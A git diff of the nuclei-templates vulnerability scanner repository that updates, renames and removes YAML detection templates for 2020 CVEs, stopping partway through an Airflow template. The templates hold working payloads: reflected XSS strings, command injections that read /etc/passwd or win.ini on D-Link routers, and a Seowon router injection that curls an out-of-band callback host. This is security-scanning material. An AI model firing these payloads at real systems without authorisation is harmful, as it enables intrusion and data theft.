a/nuclei-templates/CVE-2020/CVE-2020-13483.yaml b/nuclei-templates/CVE-2020/CVE-2020-13483.yaml deleted file mode 100644 index c029d81a5d..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13483.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-13483 -info: - name: Bitrix24 through 20.0.0 allows XSS - author: pikpikcu,3th1c_yuk1 - severity: medium - description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. - reference: - - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 - - https://twitter.com/brutelogic/status/1483073170827628547 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-13483 - cwe-id: CWE-79 - tags: cve,cve2020,xss,bitrix -requests: - - method: GET - path: - - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>' - - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '*/)});function __MobileAppList(){alert(1)}//' - - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" - condition: or - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13638.yaml b/nuclei-templates/CVE-2020/CVE-2020-13638.yaml index 9e19423308..041b88e439 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13638.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13638.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13638 cwe-id: CWE-269 - epss-score: 0.324 - epss-percentile: 0.96575 + epss-score: 0.39352 + epss-percentile: 0.97152 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true @@ -96,5 +96,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200f308b07b55b6fb74c46385ddbd097d885a10d1c7bc10744ee56d56b42b960d7022100b975be94d469a370d61f2adf2bbad48c115e5a35e426276e555d9b281daa8141:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e7f135f57aac986c270d66ef6afc8f90e89fd565b52145eb6316f4a20da0e4b5022100876e3b9f1953ea0c2910db7241c0c1297552adc50ced66724b0c4758e85e790f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-13700.yaml b/nuclei-templates/CVE-2020/CVE-2020-13700.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-13700.yaml rename to nuclei-templates/CVE-2020/CVE-2020-13700.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-13820.yaml b/nuclei-templates/CVE-2020/CVE-2020-13820.yaml index e84200a2d4..01d5fcd3e6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13820.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13820.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center. reference: - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219 - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 - https://gtacknowledge.extremenetworks.com - https://nvd.nist.gov/vuln/detail/CVE-2020-13820 + - https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13820 cwe-id: CWE-79 + epss-score: 0.00289 + epss-percentile: 0.65704 + cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: extremenetworks + product: extreme_management_center shodan-query: title:"Extreme Management Center" - verified: "true" - tags: cve,cve2020,xss,extremenetworks + tags: cve2020,cve,xss,extremenetworks -requests: +http: - method: GET path: - "{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)" @@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/05 +# digest: 490a0046304402203b2fba8721ad31fdedf35ac64fd1aa9f3daf248c5a28d0e177bc476aef75fc3b02207c1ceaaceaae8e7f5b2fb30ff8a741683dff8b8466099618f50ab7e864979a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-13851.yaml b/nuclei-templates/CVE-2020/CVE-2020-13851.yaml index 5d5c1f36eb..fdaef27edb 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13851.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13851.yaml @@ -10,13 +10,14 @@ info: - https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-13851 - https://www.coresecurity.com/advisories + - https://github.com/hadrian3689/pandorafms_7.44 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-13851 cwe-id: CWE-78 - epss-score: 0.96827 - epss-percentile: 0.99604 + epss-score: 0.96952 + epss-percentile: 0.99674 cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:* metadata: verified: "true" @@ -24,7 +25,7 @@ info: vendor: pandorafms product: pandora_fms shodan-query: title:"Pandora FMS" - tags: packetstorm,cve,cve2020,rce,pandora,unauth,artica + tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms http: - raw: @@ -50,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220320f30386e153f58d47a6a4f294a81f205688bf7e6706b1019ce1275767b8eff022100c6558e6920bb087c33bd12cd6c04ce47f4dbb1d6b627a562e711abd97149312b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058dede621391a5c5aa3cbab99614f6e05eb1c25d174cb444fc225088cfc531a3022100d43ab48e876ed266cffa72d5a17bcaf610d3d10d131b046556958fd7be786cf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-13937.yaml b/nuclei-templates/CVE-2020/CVE-2020-13937.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-13937.yaml rename to nuclei-templates/CVE-2020/CVE-2020-13937.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14144.yaml b/nuclei-templates/CVE-2020/CVE-2020-14144.yaml index 943dcb48a3..4f34dc02ce 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-14144.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-14144.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides." + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Fixed in version 1.16.7. reference: - https://dl.gitea.io/gitea/1.16.6 @@ -18,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 - epss-score: 0.97212 - epss-percentile: 0.99783 + epss-score: 0.97181 + epss-percentile: 0.99775 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: gitea product: gitea shodan-query: html:"Powered by Gitea Version" - tags: cve,cve2020,rce,gitea,authenticated,git,intrusive + tags: cve2020,cve,rce,gitea,authenticated,git,intrusive http: - raw: @@ -98,4 +100,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 4a0a00473045022100da14ee38fd4ca9882d078743a1c158d3eb4306c144ad47eb5f2f5c6cf2949a6a022048de5727705f006845ff35f9e549546d8ca094a851fde2685a5e502bc8eb6306:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e398d9d82ff8b9b88f71c78ed86a11cd12d18203426a0f2396f654d19d04022a0220753f0b26dc09689a5afbbb739a698e8340f6bb5296ac8e88f3fc93d75ab2cd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-14179.yaml b/nuclei-templates/CVE-2020/CVE-2020-14179.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-14179.yaml rename to nuclei-templates/CVE-2020/CVE-2020-14179.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml index 8f848663db..36f102aa68 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml @@ -1,10 +1,9 @@ id: CVE-2020-14408 - info: - name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting + name: Agentejo Cockpit 0.10.2 - Reflected XSS author: edoardottt severity: medium - description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -13,30 +12,24 @@ info: reference: - https://github.com/agentejo/cockpit/issues/1310 - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 metadata: verified: true - tags: cve,cve2020,cockpit,agentejo,xss,oss - + tags: cve,cve2022,cockpit,agentejo,xss,oss requests: - method: GET path: - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - matchers-condition: and matchers: - - type: word part: body words: - "redirectTo = '/92874';alert(document.domain)//280';" - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml b/nuclei-templates/CVE-2020/CVE-2020-14864.yaml index de64bc96de..1a74ce325d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-14864.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-14864 - tags: cve,cve2020,oracle,lfi + tags: cve,cve2020,oracle,lfi,kev requests: - method: GET path: diff --git a/nuclei-templates/CVE-2020/cve-2020-15148.yaml b/nuclei-templates/CVE-2020/CVE-2020-15148.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15148.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15148.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15505.yaml b/nuclei-templates/CVE-2020/CVE-2020-15505.yaml deleted file mode 100644 index d5896cbea1..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-15505.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-15505 -info: - name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - author: dwisiswant0 - severity: critical - description: | - A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors. - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[2] below. - # This template works by passing a Hessian header, otherwise; - # it will return a 403 or 500 internal server error. Reference[3]. - reference: - - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 - - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - - https://github.com/orangetw/JNDI-Injection-Bypass - tags: cve,cve2020,mobileiron,rce,sentry - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-15505 -requests: - - raw: - - | - POST /mifs/.;/services/LogService HTTP/1.1 - Host: {{Hostname}} - Referer: https://{{Hostname}} - Content-Type: x-application/hessian - Connection: close - - {{hex_decode('630200480004')}} - matchers-condition: and - matchers: - - type: word - words: - - "application/x-hessian" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-15867.yaml b/nuclei-templates/CVE-2020/CVE-2020-15867.yaml index ff8437efbc..95dd9b282a 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-15867.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-15867.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later). reference: @@ -17,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 - epss-score: 0.96643 - epss-percentile: 0.99534 + epss-score: 0.96659 + epss-percentile: 0.99554 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true @@ -96,4 +98,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 490a0046304402202bc22d5d6de1a82926e74e6b311921508a1995f602cdee6de3d5e48c67f43fbf022077ae3e84c30d0668d4e33bd6024d18f8d475dc00a0358d53509ca18dbbc088b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a215b7c44f2fb218def60e0d879afe798183c5f934d27d519c1f12a15ae90bd022071abea3ccb7139b8aaf1d296ad270e2afd6df803ea81281e87c092e97711d955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-15895.yaml b/nuclei-templates/CVE-2020/CVE-2020-15895.yaml index 17440857bf..f394848dde 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-15895.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-15895.yaml @@ -1,26 +1,36 @@ id: CVE-2020-15895 info: - name: D-Link DIR-816L - Cross Site Scripting + name: D-Link DIR-816L 2.x - Cross-Site Scripting author: edoardottt severity: medium description: | - An XSS issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter, before it's printed on the webpage. + D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - - https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-15895 - https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/ - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169 + - https://nvd.nist.gov/vuln/detail/CVE-2020-15895 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-15895 cwe-id: CWE-79 + epss-score: 0.00187 + epss-percentile: 0.55045 + cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: dlink + product: dir-816l_firmware shodan-query: html:"DIR-816L" - tags: cve,cve2020,dlink,xss + tags: cve2020,cve,dlink,xss -requests: +http: - method: GET path: - "{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//" @@ -42,3 +52,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100cc380765700ef1b2b7da3e313af50c0fde3da0fbfcd22a8d457ce221e7fc062b022054cf01c8bbed23df43e959ca8c4f1ca8a91b866aabce40c770d01b43ec7468eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-16139.yaml b/nuclei-templates/CVE-2020/CVE-2020-16139.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16139.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16139.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml deleted file mode 100644 index 66a1295845..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: cve-2019-16920 - -info: - name: Unauthenticated Multiple D-Link Routers RCE - author: dwisiswant0 - severity: critical - description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. - - # References: - # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r - -requests: - - raw: - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-16952.yaml b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16952.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16952.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17362.yaml b/nuclei-templates/CVE-2020/CVE-2020-17362.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17362.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17362.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-17456.yaml b/nuclei-templates/CVE-2020/CVE-2020-17456.yaml index 7dd3efc2b6..b7e29cd0a0 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17456.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-17456.yaml @@ -1,21 +1,37 @@ id: CVE-2020-17456 info: - name: Seowon SLC-130 And SLR-120S - Unauthenticated Remote Code Execution + name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution author: gy741,edoardottt severity: critical - description: SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page. + description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - tags: rce,seowon,router,unauth,iot,cve,cve2020,oast + - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 + epss-score: 0.96263 + epss-percentile: 0.99495 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: seowonintech + product: slc-130_firmware + tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech +variables: + useragent: '{{rand_base(6)}}' -requests: +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 @@ -30,9 +46,8 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -40,6 +55,11 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + - type: word part: header words: @@ -47,4 +67,5 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 +# digest: 4a0a00473045022100dfd063b9fa64a8c67ede0a35c9c5ef23fc7ffd9b31d32de5343eaa430bd12815022063f498b2e3e49255cc16b78a9ae2e77f66144915d845e6feae3ced267930d7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-17463.yaml b/nuclei-templates/CVE-2020/CVE-2020-17463.yaml index 5c0c9bf50d..780e36249a 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17463.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-17463.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 115 reference: - https://www.exploit-db.com/exploits/48741 @@ -18,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17463 cwe-id: CWE-89 - epss-score: 0.92663 - epss-percentile: 0.9876 + epss-score: 0.94399 + epss-percentile: 0.99154 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: thedaylightstudio product: fuel_cms shodan-query: http.title:"fuel cms" - tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev + tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio http: - raw: @@ -61,4 +63,4 @@ http: - 'status_code_3 == 200' - 'contains(body_1, "FUEL CMS")' condition: and -# digest: 4b0a004830460221009195dfdfc3c1a5e8422577e8917d60bc6873a4825bcf511365e818ea5f36cfd3022100af65296d11033dadc4be3d9563124da952ddff6c8cce5b19562ef31e99bc76d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-17518.yaml b/nuclei-templates/CVE-2020/CVE-2020-17518.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17518.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17518.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-17526.yaml b/nuclei-templates/CVE-2020/CVE-2020-17526.yaml index 33fae9deff..c5d48a8103 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17526.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-17526.yaml @@ -6,36 +6,49 @@ info: severity: high description: | Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code. + remediation: Change default value for [webserver] secret_key config. reference: - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E - http://www.openwall.com/lists/oss-security/2020/12/21/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-17526 - remediation: Change default value for [webserver] secret_key config. + - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 + epss-score: 0.08372 + epss-percentile: 0.93787 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: apache + product: airflow fofa-query: Apache Airflow - verified: "true" tags: cve,cve2020,apache,airflow,auth-bypass -requests: +http: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} - - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Cookie: 